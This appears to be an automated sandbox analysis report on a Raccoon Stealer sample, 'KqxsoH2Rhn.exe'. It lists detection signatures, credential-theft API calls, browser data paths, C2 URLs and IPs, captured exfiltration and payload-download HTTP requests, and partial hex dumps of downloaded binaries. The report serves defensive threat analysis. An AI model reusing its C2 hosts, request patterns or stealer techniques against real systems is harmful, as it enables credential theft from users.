Windows Analysis Report KqxsoH2Rhn.exe

Overview

General Information

Sample Name: KqxsoH2Rhn.exe
Analysis ID: 518394
MD5: fa5e0b9dd2cd2684fb54cc7f39f229b6
SHA1: 9f36eb3d78929f1877f0e4f4b2fa74eb580bac17
SHA256: 67a5471d59ca74d55eda2a899d27e0c650b4bd66747461f1bdda634dc96d0c18
Tags: exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Tries to steal Mail credentials (via file / registry access)
Contains functionality to steal Internet Explorer form passwords
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Suspicious Del in CommandLine
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Binary contains a suspicious time stamp
PE file contains more sections than normal
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: KqxsoH2Rhn.exe Virustotal: Detection: 35% Perma Link
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR
Machine Learning detection for sample
Source: KqxsoH2Rhn.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, 1_2_0040E727
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040CB54 __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey, 1_2_0040CB54
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 1_2_0040D560
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 1_2_0042770E
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 1_2_0040F78B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 1_2_004278E1
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 1_2_0040DC7B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot, 1_2_0041E52C

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Unpacked PE file: 1.2.KqxsoH2Rhn.exe.400000.0.unpack
Uses 32bit PE files
Source: KqxsoH2Rhn.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: KqxsoH2Rhn.exe, 00000001.00000003.370376940.000000004DC97000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: C:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: aC:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 1_2_0043DA90
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0045E752 FindFirstFileExW, 1_2_0045E752
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00434721 __EH_prolog,GetLogicalDriveStringsA, 1_2_00434721
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49744 -> 194.180.174.182:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49744 -> 194.180.174.182:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://178.23.190.57/rino115sipsip
Source: Malware configuration extractor URLs: http://91.219.236.162/rino115sipsip
Source: Malware configuration extractor URLs: http://185.163.47.176/rino115sipsip
Source: Malware configuration extractor URLs: http://193.38.54.238/rino115sipsip
Source: Malware configuration extractor URLs: http://74.119.192.122/rino115sipsip
Source: Malware configuration extractor URLs: http://91.219.236.240/rino115sipsip
Source: Malware configuration extractor URLs: https://t.me/rino115sipsip
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
Source: Joe Sandbox View ASN Name: MIVOCLOUDMD MIVOCLOUDMD
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rino115sipsip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.47.176
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.182
Source: global traffic HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/e2fece3ec028ffea81a6e29ab137c790945d5c2c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182
Source: global traffic HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/553beaf07e7bcfa31cdc14361c20d4ecff5638ed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 54954Host: 194.180.174.182
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.219.236.162 91.219.236.162
Source: Joe Sandbox View IP Address: 91.219.236.162 91.219.236.162
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 09 Nov 2021 11:38:28 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 09 Nov 2021 11:38:32 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.57
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.57
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.57
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.57
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
